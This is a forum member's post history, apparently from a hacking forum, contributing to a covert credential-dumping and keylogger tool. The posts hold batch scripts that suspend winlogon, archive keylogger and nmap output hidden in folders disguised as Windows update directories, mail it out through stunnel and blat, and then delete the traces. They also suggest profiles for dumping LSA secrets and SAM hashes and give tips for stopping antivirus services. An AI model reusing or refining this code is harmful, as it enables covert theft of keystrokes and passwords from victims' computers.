
hacked_13

Members
  • Posts: 5

  1. hacked_13

    exe to AHK

    Hey, I was hoping to get a few ideas or suggestions on the matter. With ahk files when you compile them you can make them with a password. But when they are executed as an exe, they are of course loaded into memory, and are then executed. As with all exe processes. My one question is does anyone know of a program or memory scanner where I could use it to get the data from memory. Ta. Or if anyone has other ideas, feel free to contribute.
  2. arrr yes good old year 10. I just finished my y12. like last exam forever!! gl man, and it's not the be all and end all
  3. Hey man cool work, I just had a brain wave, Okay to be honest we are not going to do a 3 second configure when we are about to attack a computer. We are going to set up the payload the day/night before using a comp which more than likely we have .Net Framework installed. (no attack intended @DMilton) Okay, Could you add the profiles. Like having a drop down box or radio buttons where you can choose a profile. This you could easily write into your own config. with a something simple like this LSA Secrets,0,1,1, IE,0,1,1, SAM,1,1,1, Where "name","profile1","profile2","profile3", Cause that would 1 minimise space. and could easily be loaded at startup of the program. Happy Coding!
  4. Just a small extra note, I do know that you can't kill Zone Alarm (zlclient.exe) And I also know that Avast (newest version) now does a pop up when it's about to close, it makes an overlay on your whole screen saying it has picked up a kill code more or less and whether you want it to continue. What I have found in past versions of Norton and the latest version of Trend Micro. Is that instead of attacking the AV process itself is that you actually Stop the service(s). I know in Trend for a fact, that you can Stop then turn the service to Manual for the Real Time Scanner. But I don't know what will happen if they have a scheduled virus scan. (But seriously tho, I would say 90% of people trust their Real Time Scanner, and always stop the scheduled scan anyway) Just some notes for thinking :)
  5. Re wrote my crappy post

    Okay now I've officially read all 34 pages.. rawr!! I am king. lol anyway. Couple of things, love your work leapo. (can't spell and I'm too tired) great idea. I also think I know the problems in the sending of information over the Gmail accounts. I'll post new send. files. Also in the start.bat script it also doesn't actually call the right file anyway.... I think this is due to you changing the files because you have not actually finished writing that part of the code. Or I could be wrong. in the start.bat. Anyway I do know what I'm talking about in the sending part.

    Keylog

    In Send.bat

        GOTO setvariables
        :sendfiles
        :: Dump logs
        pssuspend winlogon.exe
        Recover.exe
        pssuspend -r winlogon.exe
        :: Selects where to grab logs from
        if exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO AdminRights
        if not exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO TryAlternate
        :TryAlternate
        if exist %appdata%\klgr\winlogon.exe GOTO Recover
        if not exist %appdata%\klgr\winlogon.exe GOTO NoRights
        ::If admin rights are found, email logs this way
        :AdminRights
        :: Archive log in 1MB chunks
        rar a %computername%keylog.rar %systemroot%\keylog.txt -v1024k -vn
        stunnel-4.11.exe -install -quiet
        net start stunnel
        for %%i in (%systemroot%\%computername%keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099
        GOTO cleanup
        ::If adminrights are not found, email logs this way
        :NoRights
        :: Archive log in 1MB chunks
        rar a keylog.rar %appdata%\keylog.txt -v1024k -vn
        stunnel-4.11.exe -install -quiet
        net start stunnel
        for %%i in (%appdata%\keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099
        GOTO cleanup
        :Cleanup
        :: Stop stunnel
        rem taskkill /f /im stunnel-4.11.exe (??)
        net stop stunnel
        stunnel-4.11.exe -uninstall -quiet
        :: Delete documents
        rmdir /s /q docs
        ::Not sure what ^^ line does cause there should not be a docs folder due to the no hacksaw...
        :: Delete archive
        ::For Admin Rights
        del /q /f %systemroot%\%computername%keylog.r*.*
        ::For No Admin Rights
        del /q /f %appdata%\keylog.r*.*
        GOTO end
        :setvariables

    This is only minor clean up code and the bold computer name part. You weren't actually sending anything... That should "theoretically" fix the sending of the Keylogs. The Hacksaw sending is Fine But I don't have an awesome deal of knowledge of cmd to understand the NMAP one.

    NMAP

    send_partial

        GOTO Setvariables
        :sendfiles

    so I gather that :sendfiles means that it is defining that when you say later to go to This point. which is wrong.. cause you already define it later on:

        :sendfiles
        for %%i in (%computername%.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099
        GOTO cleanup

    So defining it twice I believe would make windows chuck a hissy :D (I think.. correct me if I'm wrong) So unless I am wrong (which I prob will be) by getting rid of the first ":sendfiles" it SHould fix it. as well as:

    send_partial for nmap

        :cleanup
        :: Stop stunnel
        rem taskkill /f /im stunnel-4.11.exe (??)
        net stop stunnel
        stunnel-4.11.exe -uninstall -quiet
        :: Delete documents
        :: Delete archive
        rmdir /s /q %systemroot%\$NtUninstallKB91338$
        GOTO end

    you were actually deleting the wrong folder and not the archives. oo now I get it. But yes. you forgot the 8. Just small fixes :D Also add under ::Delete documents "del /q /f %computername%.*" Now the Nmap SHOULD send, as well as the keylogger as long as it makes the logs correctly and in C:\ or wherever it's meant to be. Hope these actually work. I'm in the process of installing xp. (stupid shit os.....takes too long) on a virtual machine. So yeah. then I was going to try it :D Just thinking now as I was reading over it...that it does a 3 part send and 3 part clean up... fk it I'm still posting. :P